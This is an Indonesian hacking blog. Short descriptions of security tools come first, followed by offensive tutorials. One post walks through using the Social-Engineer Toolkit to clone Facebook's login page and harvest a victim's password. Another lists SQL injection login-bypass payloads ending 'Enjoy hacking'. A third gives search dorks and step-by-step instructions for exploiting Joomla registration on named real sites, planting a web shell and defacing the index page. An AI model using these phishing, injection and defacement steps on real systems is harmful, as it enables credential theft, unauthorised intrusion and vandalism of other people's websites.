CORETAN87.BLOGSPOT.COM

Tampilkan postingan dengan label HACKING. Tampilkan semua postingan
Tampilkan postingan dengan label HACKING. Tampilkan semua postingan

JHON THE RIPPER

John the Ripper - Retak kata sandi dan hash
John the Ripper adalah cracker kata sandi lama yang baik yang menggunakan daftar kata / kamus untuk memecahkan hash yang diberikan. Dapat memecahkan berbagai jenis hash termasuk MD5, SHA dll. Ini memiliki daftar kata sandi gratis dan berbayar yang tersedia. Ini adalah platform lintas.

John the Ripper adalah perangkat lunak cracking kata sandi gratis dan cepat. Awalnya dikembangkan untuk sistem operasi Unix, sekarang berjalan di lima belas platform yang berbeda (sebelas di antaranya adalah versi arsitektur khusus dari Unix, DOS, Win32, BeOS, dan OpenVMS). Tujuan utamanya adalah mendeteksi kata sandi Unix yang lemah. Selain beberapa crypt (3) jenis hash kata sandi yang paling umum ditemukan pada berbagai sistem Unix.

Yang didukung di luar kotak adalah hash Windows LM, plus banyak hash dan cipher lainnya dalam versi yang disempurnakan oleh komunitas.



Cracking-password-using-John-the-Ripper-in-Kali-Linux-blackMORE-Ops-3

Ini adalah salah satu pengujian kata sandi yang paling populer dan memecah program karena menggabungkan sejumlah kata sandi ke dalam satu paket, otomatis mendeteksi jenis hash kata sandi, dan termasuk cracker yang dapat disesuaikan. Ini dapat dijalankan terhadap berbagai format kata sandi terenkripsi termasuk beberapa tipe hash sandi crypt yang paling umum ditemukan pada berbagai versi Unix (berdasarkan DES, MD5, atau Blowfish), Kerberos AFS, dan Windows NT / 2000 / XP / 2003 LM hash. Modul tambahan telah memperluas kemampuannya untuk memasukkan hash dan kata sandi berbasis MD4 yang disimpan dalam LDAP, MySQL, dan lainnya.

Tipe serangan

Salah satu mode yang bisa digunakan John adalah serangan kamus. Ini mengambil contoh string teks (biasanya dari sebuah file, yang disebut daftar kata, berisi kata-kata yang ditemukan dalam kamus atau kata sandi yang sebenarnya retak sebelumnya), mengenkripsinya dalam format yang sama dengan kata sandi yang sedang diperiksa (termasuk algoritma enkripsi dan kunci), dan membandingkan output ke string yang dienkripsi. Ini juga dapat melakukan berbagai perubahan pada kata-kata kamus dan mencoba ini. Banyak dari perubahan ini juga digunakan dalam mode serangan tunggal John, yang memodifikasi teks terkait (seperti nama pengguna dengan kata sandi terenkripsi) dan memeriksa variasi terhadap hash.




daftar kata sandi

John juga menawarkan mode brute force. Dalam jenis serangan ini, program ini melewati semua teks biasa, hashing masing-masing dan kemudian membandingkannya dengan input hash. John menggunakan tabel frekuensi karakter untuk mencoba plaintext yang mengandung karakter yang lebih sering digunakan terlebih dahulu. Metode ini berguna untuk meretas kata sandi yang tidak muncul dalam daftar kata kamus, tetapi butuh waktu lama untuk dijalankan



Version: 1.8.0
Language: English
File size: 4.3 MB
Developer: jhon
OS: WINDOWS , Linux



Share:

OPENSSL

OpenSSL adalah proyek open source yang menyediakan toolkit yang kuat, kelas komersial, dan berfitur lengkap untuk protokol Transport Layer Security (TLS) dan Secure Sockets Layer (SSL).

Ini juga merupakan perpustakaan kriptografi tujuan umum.

Toolkit ini dilisensikan di bawah lisensi ala Apache, yang pada dasarnya berarti bahwa Anda bebas untuk mendapatkan dan menggunakannya untuk tujuan komersial dan non-komersial dengan tunduk pada beberapa ketentuan lisensi sederhana.

Legalitas

Harap diingat bahwa ekspor / impor dan / atau penggunaan perangkat lunak kriptografi yang kuat, menyediakan pengait kriptografi, atau bahkan hanya menyampaikan rincian teknis tentang perangkat lunak kriptografi adalah ilegal di beberapa bagian dunia.

Jadi ketika Anda mengimpor paket ini ke negara Anda, distribusikan kembali dari sana atau bahkan hanya mengirim email ke saran teknis atau bahkan patch sumber ke penulis atau orang lain yang Anda sangat disarankan untuk memperhatikan setiap undang-undang atau peraturan yang berlaku bagi Anda.

Dukungan Komersial

OpenSSL adalah upaya kerja sama dari komunitas relawan di seluruh dunia. Kami selalu bersyukur untuk menerima dukungan untuk proyek ini.

Selain bergabung dengan komunitas, Anda dapat memberikan donasi langsung ke proyek. Kontribusi Anda akan membantu mendanai anggota tim pengembangan kami. Sponsor yang signifikan memiliki suara dalam arah OpenSSL di masa mendatang serta pengakuan dan penempatan logo. Kami ingin mengambil kesempatan ini untuk mengakui mereka yang telah memberikan dukungan keuangan.





Version: 0.9.8h
Language: English
File size: 4.44 MB
Developer: Eric Young , Tim Hudson
OS: Windows/Unix/Mac


Share:

OPENSSH / PUTTY / SSH

OpenSSH / PuTTY / SSH adalah program yang sekarang ada di mana-mana untuk masuk atau menjalankan perintah pada mesin jarak jauh. Ini menyediakan komunikasi terenkripsi yang aman antara dua host yang tidak dipercaya melalui jaringan tidak aman, menggantikan alternatif telnet / rlogin / rsh yang sangat tidak aman.

Sebagian besar pengguna UNIX menjalankan open source openSSH server dan klien. Pengguna Windows sering lebih memilih klien PuTTY gratis, yang juga tersedia untuk banyak perangkat seluler, dan WinSCP.

Pengguna Windows lainnya lebih memilih port OpenSSH berbasis terminal bagus yang dilengkapi dengan Cygwin. Ada lusinan klien gratis dan eksklusif lainnya untuk dipertimbangkan juga.

Menggunakan



Untuk login ke shell pada remote host (mengganti Telnet dan rlogin)
Untuk mengeksekusi satu perintah pada host jarak jauh (mengganti rsh)
Untuk mengatur login otomatis (tanpa password) ke server jauh (misalnya, menggunakan OpenSSH [23])
Transfer file aman
Dalam kombinasi dengan rsync untuk membuat cadangan, salin dan rubah file secara efisien dan aman
Untuk meneruskan atau membuat tunneling port (jangan bingung dengan VPN, yang mengarahkan paket di antara jaringan yang berbeda, atau menjembatani dua domain broadcast menjadi satu).
Untuk digunakan sebagai VPN terenkripsi penuh. Perhatikan bahwa hanya server dan klien OpenSSH yang mendukung fitur ini.


Version: 3.81
Language: English
File size: 2.29MB
Developer: OpenBSD
OS: Windows/Unix/Mac

Share:

x64DBG

DBG adalah bagian debugging dari debugger. Ini menangani debugging (menggunakan TitanEngine) dan akan menyediakan data untuk GUI.
GUI adalah bagian grafis dari debugger. Ini dibangun di atas Qt dan menyediakan interaksi pengguna.
Bridge adalah pustaka komunikasi untuk bagian DBG dan GUI (dan mungkin di masa depan lebih banyak bagian).
Jembatan dapat digunakan untuk bekerja pada fitur baru, tanpa harus memperbarui kode dari bagian lain.

fitur

Sumber terbuka
Antarmuka pengguna baru yang intuitif dan akrab
C-seperti pengurai ekspresi
Fitur debugging lengkap file DLL dan EXE (TitanEngine)
Sidebar IDA dengan panah lompat
Penyorot token petunjuk seperti IDA (sorot register, dll.)
Peta memori
Tampilan simbol
Tampilan utas
Tampilan kode sumber
Tampilan daftar sensitif konten
Skema warna sepenuhnya dapat disesuaikan
Dinamis mengenali modul dan string
Impor reconstructor terintegrasi (Scylla)
Disassembler cepat (Capstone)


Version: 0.0.2.5
Language: English
File size: 26.3 MB
Developer: x64dbg.com
OS: Windows (XP or Later)


Share:

NOSCRIPT

NoScript (atau NoScript Security Suite) adalah ekstensi sumber terbuka dan gratis untuk Mozilla Firefox, SeaMonkey, dan browser web berbasis Mozilla lainnya, dibuat dan secara aktif dikelola oleh Giorgio Maone, pengembang perangkat lunak Italia dan anggota dari Mozilla Security Group.

NoScript memungkinkan konten web yang dapat dieksekusi seperti JavaScript, Java, Flash, Silverlight, dan plugin lainnya hanya jika hosting situs dianggap tepercaya oleh pengguna dan sebelumnya telah ditambahkan ke daftar putih.

NoScript juga menawarkan tindakan penanggulangan spesifik terhadap eksploitasi keamanan.

NoScript adalah add-on untuk Firefox yang memblokir JavaScript, Java, Flash, dan konten plugin lainnya (memungkinkan Anda mengaktifkannya kembali secara selektif untuk situs-situs tertentu).

Ia juga menawarkan perlindungan scripting lintas situs. Ini terutama dirancang untuk menjaga keamanan pengguna web, tetapi penguji keamanan juga dapat menggunakan add-on untuk melihat skrip apa yang digunakan oleh suatu situs.

Forbidden Icon - ini berarti bahwa skrip dan konten plugin diblokir untuk situs saat ini dan subframe-nya. Bahkan jika beberapa sumber skrip pihak ketiga yang diimpor oleh halaman tersebut mungkin ada dalam daftar putih Anda, tidak ada kode yang dapat berjalan karena dokumen hosting tidak diaktifkan.
Ikon Subkonten Sebagian Diizinkan - ini berarti situs tingkat atas masih terlarang tetapi beberapa subkontrak aktif (baik bingkai atau objek plugin) diizinkan: beberapa kode mungkin berjalan, tetapi halaman tersebut kemungkinan tidak berfungsi dengan benar karena sumber skrip utamanya masih diblokir.
Icon yang Dibolehkan Sebagian - ini berarti skrip diizinkan untuk dokumen level teratas (utama), tetapi beberapa konten aktif atau sumber skrip lain yang diimpor oleh halaman ini belum diizinkan. Ini terjadi ketika ada beberapa bingkai, atau elemen skrip yang menautkan kode yang dihosting di host pihak ke-3.
Karena sering kali tidak diperlukan, situs tersebut cenderung berfungsi bahkan dalam keadaan "sebagian diizinkan" ini. Selain itu, dalam banyak kasus ketika situs disusupi dengan malware JavaScript, kode berbahaya tersebut di-hosting di situs "teduh" eksternal. Meskipun sebelumnya Anda telah mengizinkan situs level teratas, situs eksternal ini masih diblokir dan serangan itu gagal.
Diizinkan dengan Icon Konten Tertanam yang Diblokir - ini berarti bahwa semua sumber skrip untuk laman diizinkan tetapi beberapa konten yang disematkan (frame atau objek plugin) diblokir. Anda dapat memeriksa dan mengizinkan konten yang diblokir baik dengan mencari placeholder visual berwarna kuning di halaman atau dengan memeriksa Diizinkan dengan Sub-objek Objek Tersembunyi Blok Diblokir Objek Diblokir.
Icon Sebagian Diperbolehkan / Sebagian Tidak Aman - ini berarti bahwa skrip diizinkan untuk beberapa URL, dan semua yang lainnya ditandai sebagai tidak tepercaya.
Diizinkan Icon - ini berarti eksekusi skrip diperbolehkan untuk situs saat ini
Ikon Diizinkan Secara Global - ini berarti bahwa skrip diizinkan secara global (mengapa Anda memutuskan untuk menjelajah dengan perlindungan rendah ??



Version: 2.9.0.14
Language: English
File size: 551 KB
Developer: Giorgio Maone
OS: Windows/Unix/Mac

              D O W N L O A D
Share:

FIREBUG

Firebug adalah add-on untuk Firefox yang menyediakan akses ke internal browser. Ini fitur editing langsung HTML dan CSS, penampil DOM, dan debugger JavaScript.

Penguji keamanan aplikasi web menghargai kemampuan untuk melihat apa yang terjadi di balik layar peramban.

Firebug adalah ekstensi browser web gratis dan sumber terbuka untuk Mozilla Firefox yang memfasilitasi proses debug, pengeditan, dan pemantauan langsung dari CSS, HTML, DOM, XHR, dan JavaScript situs web apa pun.

Firebug terintegrasi dengan Firefox untuk meletakkan banyak alat pengembangan web di ujung jari Anda saat menjelajah. Anda dapat mengedit, men-debug, dan memantau CSS, HTML, dan JavaScript secara langsung di halaman web mana saja.

fitur

Periksa HTML dan modifikasi gaya dan tata letak secara real-time
Gunakan debugger JavaScript paling canggih yang tersedia untuk browser apa pun
Akurat menganalisis penggunaan dan kinerja jaringan
Memperluas Firebug dan menambahkan fitur untuk menjadikan Firebug lebih kuat
Dapatkan informasi yang Anda butuhkan untuk menyelesaikannya dengan Firebug
Fitur baru untuk pengguna Firebug:
Panel Kinerja - Alat Kinerja memberi Anda wawasan tentang kemampuan respons umum, JavaScript, dan tata letak situs Anda.
Panel Memori - Alat Memori memungkinkan Anda mengambil snapshot dari tumpukan memori tab saat ini.
Editor Audio Web, Editor Shader, dan Kanvas - Alat Pengembang untuk mendebug konten kaya media di web.
Storage Inspector - The Storage Inspector memungkinkan Anda untuk memeriksa berbagai jenis penyimpanan yang dapat digunakan halaman web (cache, cookie, penyimpanan lokal & sesi, indexedDB).
Mode Desain Responsif - Mode Desain Responsif memudahkan untuk melihat bagaimana situs web atau aplikasi web Anda akan terlihat pada ukuran layar yang berbeda.
Animation Inspector - The Animation Inspector menampilkan animasi pada halaman yang disinkronkan sepanjang garis waktu, dengan widget draggable yang dapat Anda gunakan untuk pindah ke titik mana pun di timeline dan melihat halaman pada titik tersebut.
Dan lagi





Version: 2.0.17
Language: English
Developer: Firebug working group
OS: Windows/Unix/Mac





Share:

TOOL HACKING Cain and Abel

Kain dan Habel (sering disingkat Kain) adalah alat pemulihan kata sandi untuk Microsoft Windows. Ia dapat memulihkan banyak jenis kata sandi menggunakan metode seperti sniffing paket jaringan, memecahkan berbagai hash kata sandi dengan menggunakan metode seperti serangan kamus, serangan brute force dan cryptanalysis. Serangan kriptoanalisis dilakukan melalui tabel pelangi yang dapat dihasilkan dengan program winrtgen.exe yang disediakan bersama Cain dan Abel.





Cain & Abel menggunakan daftar kamus sebagai dasar untuk meretas kata sandi, serangan brute-force dengan mencoba sandi berbeda berkali-kali setiap detik dan mendekodekan informasi yang tersimpan di hard drive, paket ini mencoba untuk menentukan kata sandi yang benar. Perangkat lunak ini juga menghapus kata sandi yang tersembunyi dengan menunjukkan kata sandi dalam paket perangkat lunak tertentu. Mempelajari kunci jaringan nirkabel untuk informasi login Wi-Fi yang terlupakan. Perangkat lunak ini memiliki beberapa manfaat keamanan juga dengan menunjukkan di mana kata sandi tidak aman dalam sistem yang aktif.



Cain & Abel Fitur Utama:
• Cari informasi kata sandi Wi-Fi
• Temukan kemungkinan kata sandi untuk sistem operasi Windows
• Kata berbasis kamus, pengecekan kata sandi brute-force dan metode lain digunakan
• Ungkapkan bidang kata sandi tersembunyi
• Mengendus data yang disimpan di drive untuk menemukan lokasi kata sandi
• Dapat digunakan untuk keamanan untuk memverifikasi apa yang dapat dengan mudah ditemukan pada sistem Anda sendiri
Share:

TOOL HACKER MALTEGO

Maltego adalah alat penambangan data interaktif dan digunakan dalam penyelidikan online untuk menemukan hubungan antara potongan informasi dari berbagai sumber yang ada di Internet.

Detail
Maltego adalah alat pengumpulan informasi yang memungkinkan Anda untuk melihat hubungan secara visual. Ia mampu menanyakan berbagai sumber data publik dan secara grafis menggambarkan hubungan antara entitas seperti orang, perusahaan, situs web, dan dokumen



Maltego memungkinkan Anda untuk menyebutkan informasi jaringan dan domain seperti:
• Nama Domain
• Informasi Whois
• Nama DNS
• Netblock
• Alamat IP
Maltego juga memungkinkan Anda untuk menyebutkan informasi Orang seperti:
• Alamat email yang terkait dengan nama seseorang
• Situs web yang terkait dengan nama seseorang
• Nomor telepon yang terkait dengan nama seseorang
• Grup sosial yang terkait dengan nama seseorang
• Perusahaan dan organisasi yang terkait dengan nama seseorang
Maltego juga memungkinkan Anda untuk:
• Lakukan verifikasi sederhana dari alamat email
• Cari blog untuk tag dan frasa
• Identifikasi tautan masuk untuk situs web
• Ekstrak metadata dari file dari domain target




Dimana itu digunakan di dunia nyata.
Maltego dapat digunakan untuk fase pengumpulan informasi dari semua pekerjaan terkait keamanan, itu digunakan sebagai aplikasi forensik dan data mining, Ini adalah alat yang harus dimiliki di bidang forensik, keamanan dan intelijen!
Ini akan menghemat waktu Anda dan akan memungkinkan Anda untuk bekerja lebih akurat dan lebih cerdas. Maltego membantu Anda dalam proses berpikir Anda dengan menunjukkan hubungan interkoneksi secara visual antara item yang dicari.
Maltego memberi Anda penelusuran yang jauh lebih kuat, memberi Anda hasil yang lebih cerdas. Jika akses ke informasi "tersembunyi" menentukan keberhasilan Anda, Maltego dapat membantu Anda menemukannya.
Bagaimana cara menginstall
• Maltego mudah dan cepat dipasang - menggunakan Java, sehingga berjalan di Windows, Mac, dan Linux.
• Maltego memberi Anda antarmuka grafis yang membuat melihat hubungan ini instan dan akurat - memungkinkan untuk melihat koneksi tersembunyi.

** sumber : hackingtool
Share:

CARA HACK AKUN FACEBOOK DENGAN BACKTRACK

Cara ini saya dapatkan dari hacker Backtrack terpercaya Jadi coba aja deh

Alat Tempurnya :
- Backtrack 5 R3

1- open terminal

 

[---] The Social-Engineer Toolkit (SET) [---]
 [---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
 [---] Development Team: Thomas Werth [---]
 [---] Development Team: Garland [---]
[---] Version: 3.6 [---]
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
[---] Report bugs: davek@trustedsec.com [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com/ [---]

 Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com/ Select from the menu:
 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
 7) Help, Credits, and About
 99) Exit the Social-Engineer Toolkit



Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com/ Select from the menu:

 1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
 5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

 99) Return back to the main menu.

 set> 2 The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload. The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload. The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website. The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different. The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and in- corporate
Share:

LOGIN BYPASS USING SQL INJECTION

Okay After Enough of those injection we are now moving towards Bypassing Login pages using SQL Injection.

Its a very old trick so i got nothing new other than some explainations and yeah a lil deep understanding with some new flavors of bypasses.



Okay rather than making the Tutorial very i long i will go point by point.

Note before reading this if you have not read the Basic SQL injection then please read that for a better understanding and be here step by step completing the injections.

First let us see an example of piece of code that actually creates the Login Page vulnerable to this attack.

Example:





 What we can see above is a PHP code which takes the user Input put the into the SQL Query and then check if any row is returned it allow you to get Log in. Now as we can see the query is quoting the input with single quote, that means we have to use a single quote to close the first quote and then inject. So lets Inject ' or ''=' into the Query: Logging in with following details: Username : ' or ''=' Password : ' or ''='



 so what i actually did is made the query to return true using the or. We can even try and comment out the query using any comment operator like using the following username and password. Username : ' or 1-- Password : what we did is we left the password field empty and commented out the rest of the query. so lets try and check the Query part.



 Here anything after -- wont be executed which makes the query to be:



 and it will return all the rows. and we can bypass the Login. This was the basic okay let us assume now different queries and different injection for them. Query:

 

Injections: ') or true-- ') or ('')=(' ') or 1-- ') or ('x')=(' Query:



Injections: " or true-- " or ""=" " or 1-- " or "x"=" Query:
 

Injections: ") or true-- ") or ("")=(" ") or 1-- ") or ("x")=(" Query:



Injections: ')) or true-- ')) or ((''))=((' ')) or 1-- ')) or (('x'))=((' Well that was kind of enough for the Explaination now time to finish so i will give you my own bypass list which i made.

 

The list was getting long so i had to remove payloads with different comments...you can now make them yourself. just add different Comments types with all these payloads........... Enjoy hacking !!!!!

 Author : Zenodermus Javanicus Date : 2014-04-03
Share:

SQL INJECTION AUTHENTIC BYPASS CHEAT SHEET

Daftar ini dapat digunakan oleh penguji penetrasi ketika pengujian untuk otentikasi otentikasi SQL. Penetrasi penetrasi dapat menggunakannya secara manual atau melalui sendawa untuk mengotomatisasi proses. Pencipta daftar ini adalah Dr. Emin İslam TatlıIf (Anggota Dewan OWASP). Jika Anda memiliki saran lain, silakan tinggalkan komentar untuk meningkatkan dan memperluas daftar


Share:

TUTORIAL DEFACE

dari kalian yang meminta tutor deface dengan trik com_user, kali ini saya akan memberi gambaran tentang deface dengan com_user. ok langsung

1. Download dulu software xploit joomla
Exploit link 1-------D O W O N L O A D

Exploit link 2----------D O W N L O A D

Exploit 1 atau 2 sama saja,cuma beda tampilanya aja kok... :D

dan download shell 1n73ction --------D O W N L O A D

Dork:

inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com

Jangan Lupa Dork kembangin lagi :)

Exploit :
index.php?option=com_users&view=registration

selanjutnya cari target vuln dengan dork diatas. yang kalian perlu tau perbedaan site vul dengan tidak vuln liat gambar berikut :







Kali ini saya sudah dapat target http://esv.be
lalu kita exploit sehingga menjadi http://esv.be/%20index.php?option=com_users&view=registration
dan tampilanya menjadi seperti gambar


setelah itu tekan CTRL+U dan kemudian tekan  CTRL+F lalu ketik "HIDDEN" (tanpa tanda petik)
dan cari kode seperti yang saya tunjuk panah merah itu


setelah ketemu,buka file xploit yang kamu download tadi buka ke notepad,lalu copy code yang seperti digambar diatas dan pastekan di file exploit tadi. lihat gambar



ok setelah itu copy juga url web target http://gym-megal.tri.sch.gr dan pastekan di file exploit. lihat  gambar



NB : ganti tulisan test@gmail dengan alamat gmail kamu,atas bawah harus sama ya... :) 
ok lanjut
setela itu klik save.
kemudian cari dimana kamu menyimpan file exploit tadi dan klik 2 x jadi seperti ini



dan klik Register
Nanti kalian akan dibawa ke halaman register lagi. isi passwordnya sesukamu. lihat gambar




pada kali ini pssword ane ini "kacang",dan klik yang register pada tnda merah itu artinya register,jika vuln maka akan seperi gambar



dan link konfirmasi akan dikirim ke email kamu.

sekarang kita buka email kita liaht pada kotak masuk apakah sudah terkirim link konfirmasi apa blm
ok setelah link konfirmsi msuk ke email kita kita klik link nya. Lihat gambar

setelah di klik nanti akan di arahkan kesini. lihat gambar



isikan user name : genesis
password : kacang

sesuai dengan yang di email yang kita terima tadi, setelah login akan seperti ini. lihat gambar


Ok registrasi selesai,,,ada pertanyaan sampai sini..???
kalu ga ada kita lanjut ke halaman administratornya http://esv.be/administrator/


Masukkan username : genesis
dan pssword : kacang
lalu klik login
daaaaannn...taraaaaaaa kita masuk ke cpanelnya


lalu klik pada template nya seperti yang saya kasih tanda panah merah itu.

setelah itu klik templates  yang saa beri panah seperti pada gambar di bawah





setelah di klik lalu klik Wijzigen hoofdpagina template lihat gambar



hapus smua code yang ada pada kotak tersebut


ok...sekarang buka file shell yang kalian download tadi. klik kanan open with notepad.
kopi code script shellnya dan pastekan di kotak tadi lalu klik save. Lihat gambar
jika shell tertanam dan suk sukses akan seperti gambar



saatnya memanggil shell, jadi perintahnya http://esv.be/templates/atomic/index.php dan enter maka akan ada tampilan backdoor. setelah itu tekan Tab pada keyboart atau arahkan kursor ke tengah yang saya beri tanda panah.Lihat gambar

dan masukan paswordnya 1n73ction dan enter. Lihat gambar



setelah itu anda akan melihat tampilan shell.

setelah itu klik atomic.lihat gambar


cari index.php dan klik edit .Lihat gambar


haspus semua code yang da di dalam kotak dan ganti dengan script deface kamu. Lihat gambar




ubah /customers/4/9/f/esv.be/httpd.www/templates/atomic/index.php menjadi /customers/4/9/f/esv.be/httpd.www/index.php dan klik save.
setelah itu buka url webnya dan silahkan di show offin dah

hasil esv.be/



SELAMAT MENCOBA...!!!!!!!!!!!!!!!!!!

Share:

CARA HACK AKUN FACEBOOK DENGAN BACKTRACK

Cara ini saya dapatkan dari hacker Backtrack terpercaya Jadi coba aja deh

Alat Tempurnya :
- Backtrack 5 R3

1- open terminal

root@AhmedShamy:~# cd /pentest/exploits/set
root@AhmedShamy:/pentest/exploits/set# ./set

01011001011011110111010100100000011100
10011001010110000101101100011011000111
10010010000001101000011000010111011001
10010100100000011101000110111100100000
01101101011101010110001101101000001000
00011101000110100101101101011001010010
00000110111101101110001000000111100101
10111101110101011100100010000001101000
01100001011011100110010001110011001000
00001110100010110100101001001000000101
01000110100001100001011011100110101101
11001100100000011001100110111101110010
00100000011101010111001101101001011011
10011001110010000001110100011010000110
01010010000001010011011011110110001101
10100101100001011011000010110101000101
01101110011001110110100101101110011001
01011001010111001000100000010101000110
11110110111101101100011010110110100101
11010000100000001010100110100001110101
011001110111001100101010

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.6 [---]
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
[---] Report bugs: davek@trustedsec.com [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com/ [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com/

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1

.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.6 [---]
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
[---] Report bugs: davek@trustedsec.com [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com/ [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com/

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.

The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.

The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.

The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate

99) Return to Main Menu

set:webattack>4

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>2
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.65.128
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com/
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

Press <return> to continue
80

[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
80
192.168.65.128 - - [09/Feb/2013 04:46:59] "GET / HTTP/1.1" 200 -
192.168.65.128 - - [09/Feb/2013 04:47:05] "GET /index2.html HTTP/1.1" 200 -
192.168.65.128 - - [09/Feb/2013 04:47:05] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVp8mX8f
PARAM: display=
PARAM: legacy_return=1
PARAM: return_session=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: timezone=-120
PARAM: lgnrnd=184623_HAT4
PARAM: lgnjs=1360378026
POSSIBLE USERNAME FIELD FOUND: email=shamy
POSSIBLE PASSWORD FIELD FOUND: pass=123456
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT

Share:

Source Mini Webdav Upload VB6



Source Mini Webdav Upload VB6




